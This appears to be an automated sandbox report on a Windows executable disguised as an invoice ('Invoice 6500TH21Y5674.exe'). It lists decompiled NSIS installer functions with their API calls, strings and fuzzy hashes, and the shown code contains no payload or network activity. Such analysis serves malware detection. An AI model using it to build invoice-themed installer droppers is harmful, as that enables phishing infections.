                                                				_t26 =  *0x7a2744;
                                                				_v8 = _t26;
                                                				if(_t26 != 0) {
                                                					_t27 =  *0x7a3034;
                                                					_v12 = _t27;
                                                					_t39 = _t27 & 0x00000001;
                                                					if(_t39 == 0) {
                                                						E00406167(0, _t39, 0x79ed48, 0x79ed48, _a4);
                                                					}
                                                					_t26 = lstrlenA(0x79ed48);
                                                					_a4 = _t26;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t26 = SetWindowTextA( *0x7a2728, 0x79ed48);
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x79ed48;
                                                							_v52 = 1;
                                                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t39;
                                                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                						}
                                                						if(_t39 != 0) {
                                                							_t28 = _a4;
                                                							 *((char*)(_t28 + 0x79ed48)) = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                						if(_t26 < 0x800) {
                                                							_t26 = lstrcatA(0x79ed48, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t26;
                                                			}


















                                                APIs
                                                • lstrlenA.KERNEL32(0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                • lstrlenA.KERNEL32(00403210,0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                • lstrcatA.KERNEL32(0079ED48,00403210,00403210,0079ED48,00000000,00798F20,73BCEA30), ref: 00405257
                                                • SetWindowTextA.USER32(0079ED48,0079ED48), ref: 00405269
                                                • SendMessageA.USER32 ref: 0040528F
                                                • SendMessageA.USER32 ref: 004052A9
                                                • SendMessageA.USER32 ref: 004052B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: Hy
                                                • API String ID: 2531174081-2517439931
                                                • Opcode ID: 05c6c48280d972a5241ed69f6299bcd720d19ae0d52461344edbf183de07e014
                                                • Instruction ID: 95508abd931072ea88f050004e9a273e6bd30dde68a0f7ca5354031f7b80a04f
                                                • Opcode Fuzzy Hash: 05c6c48280d972a5241ed69f6299bcd720d19ae0d52461344edbf183de07e014
                                                • Instruction Fuzzy Hash: A521A175900118BBDF119FA9DD809DFBFB9EF09354F1480BAF544B6291C6388E408F98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004063AF(CHAR* _a4) {
                                                				char _t5;
                                                				char _t7;
                                                				char* _t15;
                                                				char* _t16;
                                                				CHAR* _t17;
                                                
                                                				_t17 = _a4;
                                                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                					_t17 =  &(_t17[4]);
                                                				}
                                                				if( *_t17 != 0 && E00405AD9(_t17) != 0) {
                                                					_t17 =  &(_t17[2]);
                                                				}
                                                				_t5 =  *_t17;
                                                				_t15 = _t17;
                                                				_t16 = _t17;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((char*)(E00405A97("*?|<>/\":", _t5))) == 0) {
                                                							E00405C28(_t16, _t17, CharNextA(_t17) - _t17);
                                                							_t16 = CharNextA(_t16);
                                                						}
                                                						_t17 = CharNextA(_t17);
                                                						_t5 =  *_t17;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t16 =  *_t16 & 0x00000000;
                                                				while(1) {
                                                					_t16 = CharPrevA(_t15, _t16);
                                                					_t7 =  *_t16;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t16 =  *_t16 & 0x00000000;
                                                					if(_t15 < _t16) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}









                                                APIs
                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
                                                • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
                                                • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004063B0
                                                • *?|<>/":, xrefs: 004063F7
                                                • "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 004063EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-685933029
                                                • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                • Instruction ID: 4c47756038ac22285ba0d5cec53aa64a9461198f7a7023556037c09898c6efe2
                                                • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                • Instruction Fuzzy Hash: 5B11B6514047A129EB3216285C40B77BF888B97760F19407BE8D2722C2D77C5C5297BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004041BF(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t39;
                                                				long _t41;
                                                				void* _t44;
                                                				signed char _t50;
                                                				long* _t54;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L18:
                                                					return 0;
                                                				}
                                                				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                					goto L18;
                                                				} else {
                                                					_t50 = _t54[5];
                                                					if((_t50 & 0xffffffe0) != 0) {
                                                						goto L18;
                                                					}
                                                					_t39 =  *_t54;
                                                					if((_t50 & 0x00000002) != 0) {
                                                						_t39 = GetSysColor(_t39);
                                                					}
                                                					if((_t54[5] & 0x00000001) != 0) {
                                                						SetTextColor(_a8, _t39);
                                                					}
                                                					SetBkMode(_a8, _t54[4]);
                                                					_t41 = _t54[1];
                                                					_v16.lbColor = _t41;
                                                					if((_t54[5] & 0x00000008) != 0) {
                                                						_t41 = GetSysColor(_t41);
                                                						_v16.lbColor = _t41;
                                                					}
                                                					if((_t54[5] & 0x00000004) != 0) {
                                                						SetBkColor(_a8, _t41);
                                                					}
                                                					if((_t54[5] & 0x00000010) != 0) {
                                                						_v16.lbStyle = _t54[2];
                                                						_t44 = _t54[3];
                                                						if(_t44 != 0) {
                                                							DeleteObject(_t44);
                                                						}
                                                						_t54[3] = CreateBrushIndirect( &_v16);
                                                					}
                                                					return _t54[3];
                                                				}
                                                			}










                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                • Instruction ID: 0c29b1994579108119522ba9b7e42ccb12df1f79812dc60d22c4570354a7e24a
                                                • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                • Instruction Fuzzy Hash: 6021A4B16007049BCB309F78DD08B5BBBF8AF81754B14896EFD92A26E0C734E904CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E72AB24D8(intOrPtr* _a4) {
                                                				char _v80;
                                                				int _v84;
                                                				intOrPtr _v88;
                                                				short _v92;
                                                				intOrPtr* _t28;
                                                				void* _t30;
                                                				intOrPtr _t31;
                                                				signed int _t43;
                                                				void* _t44;
                                                				intOrPtr _t45;
                                                				void* _t48;
                                                
                                                				_t44 = E72AB1215();
                                                				_t28 = _a4;
                                                				_t45 =  *((intOrPtr*)(_t28 + 0x814));
                                                				_v88 = _t45;
                                                				_t48 = (_t45 + 0x41 << 5) + _t28;
                                                				do {
                                                					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
                                                					}
                                                					_t43 =  *(_t48 - 8) & 0x000000ff;
                                                					if(_t43 <= 7) {
                                                						switch( *((intOrPtr*)(_t43 * 4 +  &M72AB2626))) {
                                                							case 0:
                                                								 *_t44 = 0;
                                                								goto L17;
                                                							case 1:
                                                								__eax =  *__eax;
                                                								if(__ecx > __ebx) {
                                                									_v84 = __ecx;
                                                									__ecx =  *(0x72ab307c + __edx * 4);
                                                									__edx = _v84;
                                                									__ecx = __ecx * __edx;
                                                									asm("sbb edx, edx");
                                                									__edx = __edx & __ecx;
                                                									__eax = __eax &  *(0x72ab309c + __edx * 4);
                                                								}
                                                								_push(__eax);
                                                								goto L15;
                                                							case 2:
                                                								__eax = E72AB1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L16;
                                                							case 3:
                                                								__eax = lstrcpynA(__edi,  *__eax,  *0x72ab405c);
                                                								goto L17;
                                                							case 4:
                                                								__ecx =  *0x72ab405c;
                                                								__edx = __ecx - 1;
                                                								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                                								__eax =  *0x72ab405c;
                                                								 *((char*)(__eax + __edi - 1)) = __bl;
                                                								goto L17;
                                                							case 5:
                                                								__ecx =  &_v80;
                                                								_push(0x27);
                                                								_push(__ecx);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								__eax =  &_v92;
                                                								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x72ab405c, __ebx, __ebx);
                                                								goto L17;
                                                							case 6:
                                                								_push( *__esi);
                                                								L15:
                                                								__eax = wsprintfA(__edi, 0x72ab4000);
                                                								L16:
                                                								__esp = __esp + 0xc;
                                                								goto L17;
                                                						}
                                                					}
                                                					L17:
                                                					_t30 =  *(_t48 + 0x14);
                                                					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
                                                						GlobalFree(_t30);
                                                					}
                                                					_t31 =  *((intOrPtr*)(_t48 + 0xc));
                                                					if(_t31 != 0) {
                                                						if(_t31 != 0xffffffff) {
                                                							if(_t31 > 0) {
                                                								E72AB12D1(_t31 - 1, _t44);
                                                								goto L26;
                                                							}
                                                						} else {
                                                							E72AB1266(_t44);
                                                							L26:
                                                						}
                                                					}
                                                					_v88 = _v88 - 1;
                                                					_t48 = _t48 - 0x20;
                                                				} while (_v88 >= 0);
                                                				return GlobalFree(_t44);
                                                			}















                                                APIs
                                                  • Part of subcall function 72AB1215: GlobalAlloc.KERNEL32(00000040,72AB1233,?,72AB12CF,-72AB404B,72AB11AB,-000000A0), ref: 72AB121D
                                                • GlobalFree.KERNEL32 ref: 72AB25DE
                                                • GlobalFree.KERNEL32 ref: 72AB2618
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true
                                                • Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 9034a3be15f88567e82e349d00d846e169bc8248e423252755217931f4d3de5d
                                                • Instruction ID: 845b29b89ef7b73634f91601dd850887c03299a1581f6ed9aba8ea36ceeffe00
                                                • Opcode Fuzzy Hash: 9034a3be15f88567e82e349d00d846e169bc8248e423252755217931f4d3de5d
                                                • Instruction Fuzzy Hash: 0B419F72944280EFD3028F59CDE4D6ABBBEEF89304B104A2EF54286128D73DE915DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404AAB(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}















                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                • Instruction ID: 246458a00becd8bf3e45cced134e1bc678ff0f74541da5adfbd61824d77d36c3
                                                • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                • Instruction Fuzzy Hash: BC015E71900219BADB00DBA4DD85BFFBBBCAF55B11F10012BBB40B61D0C7B4A941CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                				char _v68;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x792118; // 0x8c00
                                                					_t11 =  *0x79e124;
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextA(_a4,  &_v68);
                                                					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                				}
                                                				return 0;
                                                			}







                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                • MulDiv.KERNEL32(00008C00,00000064,?), ref: 00402E00
                                                • wsprintfA.USER32 ref: 00402E10
                                                • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                • SetDlgItemTextA.USER32 ref: 00402E32
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402E0A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
                                                • Instruction ID: 5b578c44cce9eb850d5b1a327d08a3d6af9bf3f213875045bca18d45615f3dab
                                                • Opcode Fuzzy Hash: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
                                                • Instruction Fuzzy Hash: 6601447064020DFBEF109F60DE09EAE3769AB04304F00803AFA06A51D0DBB899519B5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E72AB22F1(void* __edx, intOrPtr _a4) {
                                                				signed int _v4;
                                                				signed int _v8;
                                                				void* _t38;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t43;
                                                				void* _t48;
                                                				signed int* _t50;
                                                				signed char* _t51;
                                                
                                                				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                				while(1) {
                                                					_t9 = _a4 + 0x818; // 0x818
                                                					_t51 = (_v8 << 5) + _t9;
                                                					_t38 = _t51[0x18];
                                                					if(_t38 == 0) {
                                                						goto L9;
                                                					}
                                                					_t48 = 0x1a;
                                                					if(_t38 == _t48) {
                                                						goto L9;
                                                					}
                                                					if(_t38 != 0xffffffff) {
                                                						if(_t38 <= 0 || _t38 > 0x19) {
                                                							_t51[0x18] = _t48;
                                                						} else {
                                                							_t38 = E72AB12AD(_t38 - 1);
                                                							L10:
                                                						}
                                                						goto L11;
                                                					} else {
                                                						_t38 = E72AB123B();
                                                						L11:
                                                						_t43 = _t38;
                                                						_t13 =  &(_t51[8]); // 0x820
                                                						_t50 = _t13;
                                                						if(_t51[4] >= 0) {
                                                						}
                                                						_t39 =  *_t51 & 0x000000ff;
                                                						_t51[0x1c] = _t51[0x1c] & 0x00000000;
                                                						_v4 = _t39;
                                                						if(_t39 > 7) {
                                                							L27:
                                                							_t40 = GlobalFree(_t43);
                                                							if(_v8 == 0) {
                                                								return _t40;
                                                							}
                                                							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                								_v8 = _v8 + 1;
                                                							} else {
                                                								_v8 = _v8 & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t39 * 4 +  &M72AB247E))) {
                                                								case 0:
                                                									 *_t50 =  *_t50 & 0x00000000;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E72AB12FE(__ebx);
                                                									goto L20;
                                                								case 2:
                                                									 *__ebp = E72AB12FE(__ebx);
                                                									_a4 = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = E72AB1224(__ebx);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L20:
                                                									 *__ebp = __eax;
                                                									goto L27;
                                                								case 4:
                                                									 *0x72ab405c =  *0x72ab405c +  *0x72ab405c;
                                                									__edi = GlobalAlloc(0x40,  *0x72ab405c +  *0x72ab405c);
                                                									 *0x72ab405c = MultiByteToWideChar(0, 0, __ebx,  *0x72ab405c, __edi,  *0x72ab405c);
                                                									if(_v4 != 5) {
                                                										 *(__esi + 0x1c) = __edi;
                                                										 *__ebp = __edi;
                                                									} else {
                                                										__eax = GlobalAlloc(0x40, 0x10);
                                                										_push(__eax);
                                                										 *(__esi + 0x1c) = __eax;
                                                										_push(__edi);
                                                										 *__ebp = __eax;
                                                										__imp__CLSIDFromString();
                                                										__eax = GlobalFree(__edi);
                                                									}
                                                									goto L27;
                                                								case 5:
                                                									if( *__ebx != 0) {
                                                										__eax = E72AB12FE(__ebx);
                                                										 *__edi = __eax;
                                                									}
                                                									goto L27;
                                                								case 6:
                                                									__esi =  *(__esi + 0x18);
                                                									__esi = __esi - 1;
                                                									__esi = __esi *  *0x72ab405c;
                                                									__esi = __esi +  *0x72ab4064;
                                                									__eax = __esi + 0xc;
                                                									 *__edi = __esi + 0xc;
                                                									asm("cdq");
                                                									__eax = E72AB1429(__edx, __esi + 0xc, __edx, __esi);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t38 = E72AB1224(0x72ab4034);
                                                					goto L10;
                                                				}
                                                			}













                                                APIs
                                                • GlobalFree.KERNEL32 ref: 72AB2447
                                                  • Part of subcall function 72AB1224: lstrcpynA.KERNEL32(00000000,?,72AB12CF,-72AB404B,72AB11AB,-000000A0), ref: 72AB1234
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 72AB23C2
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72AB23D7
                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 72AB23E8
                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 72AB23F6
                                                • GlobalFree.KERNEL32 ref: 72AB23FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true
                                                • Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                • String ID:
                                                • API String ID: 3730416702-0
                                                • Opcode ID: d35e1e6817a6b95eb40a6cc0bfd6187afd2aa73a7c80c0e73089aff493018de8
                                                • Instruction ID: b69908b105d060b8d16ed14f83ee4b247cde5c4d419de509da4ebc1b618ee052
                                                • Opcode Fuzzy Hash: d35e1e6817a6b95eb40a6cc0bfd6187afd2aa73a7c80c0e73089aff493018de8
                                                • Instruction Fuzzy Hash: 4F419AB2948381DFD3118F29C984B6ABBFDFF48311F10486EE456C69A8DB38D545CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004027DF(int __ebx, void* __eflags) {
                                                				void* _t26;
                                                				long _t31;
                                                				int _t45;
                                                				void* _t49;
                                                				void* _t51;
                                                				void* _t54;
                                                				void* _t55;
                                                				void* _t56;
                                                
                                                				_t45 = __ebx;
                                                				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                				_t50 = E00402BCE(0xfffffff0);
                                                				 *(_t56 - 0x78) = _t23;
                                                				if(E00405AD9(_t50) == 0) {
                                                					E00402BCE(0xffffffed);
                                                				}
                                                				E00405C48(_t50);
                                                				_t26 = E00405C6D(_t50, 0x40000000, 2);
                                                				 *(_t56 + 8) = _t26;
                                                				if(_t26 != 0xffffffff) {
                                                					_t31 =  *0x7a2f78;
                                                					 *(_t56 - 0x30) = _t31;
                                                					_t49 = GlobalAlloc(0x40, _t31);
                                                					if(_t49 != _t45) {
                                                						E004032DD(_t45);
                                                						E004032C7(_t49,  *(_t56 - 0x30));
                                                						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                						 *(_t56 - 0x38) = _t54;
                                                						if(_t54 != _t45) {
                                                							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                							while( *_t54 != _t45) {
                                                								_t47 =  *_t54;
                                                								_t55 = _t54 + 8;
                                                								 *(_t56 - 0x8c) =  *_t54;
                                                								E00405C28( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                								_t54 = _t55 +  *(_t56 - 0x8c);
                                                							}
                                                							GlobalFree( *(_t56 - 0x38));
                                                						}
                                                						E00405D14( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                						GlobalFree(_t49);
                                                						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                					}
                                                					CloseHandle( *(_t56 + 8));
                                                				}
                                                				_t51 = 0xfffffff3;
                                                				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                					_t51 = 0xffffffef;
                                                					DeleteFileA( *(_t56 - 0x78));
                                                					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                				}
                                                				_push(_t51);
                                                				E00401423();
                                                				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t56 - 4));
                                                				return 0;
                                                			}












                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                • GlobalFree.KERNEL32 ref: 0040288E
                                                • GlobalFree.KERNEL32 ref: 004028A1
                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 5755665d5a07ff276816291a20f7fda962d058b8d5726ef8cf218c2b9027c82a
                                                • Instruction ID: 541bef3258e2720658000fa94f276f2b73ea2b938264a1111491e3e624c892cf
                                                • Opcode Fuzzy Hash: 5755665d5a07ff276816291a20f7fda962d058b8d5726ef8cf218c2b9027c82a
                                                • Instruction Fuzzy Hash: BA21A072800128BBDF217FA5CE48DAE7E79EF05324F20423EF551762D1C67949418FA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E72AB1837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v52;
                                                				void _t45;
                                                				void _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				signed int _t61;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t69;
                                                				void* _t70;
                                                				void* _t71;
                                                				signed int _t77;
                                                				void* _t81;
                                                				signed int _t83;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t101;
                                                
                                                				_t85 = __edx;
                                                				 *0x72ab405c = _a8;
                                                				_t77 = 0;
                                                				 *0x72ab4060 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E72AB123B();
                                                				_t90 = E72AB12FE(_t42);
                                                				_t87 = _t85;
                                                				_t81 = E72AB123B();
                                                				_a8 = _t81;
                                                				_t45 =  *_t81;
                                                				if(_t45 != 0x7e && _t45 != 0x21) {
                                                					_a16 = E72AB123B();
                                                					_t77 = E72AB12FE(_t74);
                                                					_v12 = _t85;
                                                					GlobalFree(_a16);
                                                					_t81 = _a8;
                                                				}
                                                				_t46 =  *_t81;
                                                				_t101 = _t46 - 0x2f;
                                                				if(_t101 > 0) {
                                                					_t47 = _t46 - 0x3c;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
                                                						if( *((char*)(_t81 + 1)) != 0x3c) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags > 0) {
                                                								L56:
                                                								_t48 = 0;
                                                								__eflags = 0;
                                                								L57:
                                                								asm("cdq");
                                                								L58:
                                                								_t90 = _t48;
                                                								_t87 = _t85;
                                                								L59:
                                                								E72AB1429(_t85, _t90, _t87,  &_v52);
                                                								E72AB1266( &_v52);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L49:
                                                								__eflags = 0;
                                                								L50:
                                                								_t48 = 1;
                                                								goto L57;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 < _t77) {
                                                								goto L49;
                                                							}
                                                							goto L56;
                                                						}
                                                						_t85 = _t87;
                                                						_t48 = E72AB2EF0(_t90, _t77, _t85);
                                                						goto L58;
                                                					}
                                                					_t57 = _t47 - 1;
                                                					__eflags = _t57;
                                                					if(_t57 == 0) {
                                                						__eflags = _t90 - _t77;
                                                						if(_t90 != _t77) {
                                                							goto L56;
                                                						}
                                                						__eflags = _t87 - _v12;
                                                						if(_t87 != _v12) {
                                                							goto L56;
                                                						}
                                                						goto L49;
                                                					}
                                                					_t58 = _t57 - 1;
                                                					__eflags = _t58;
                                                					if(_t58 == 0) {
                                                						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
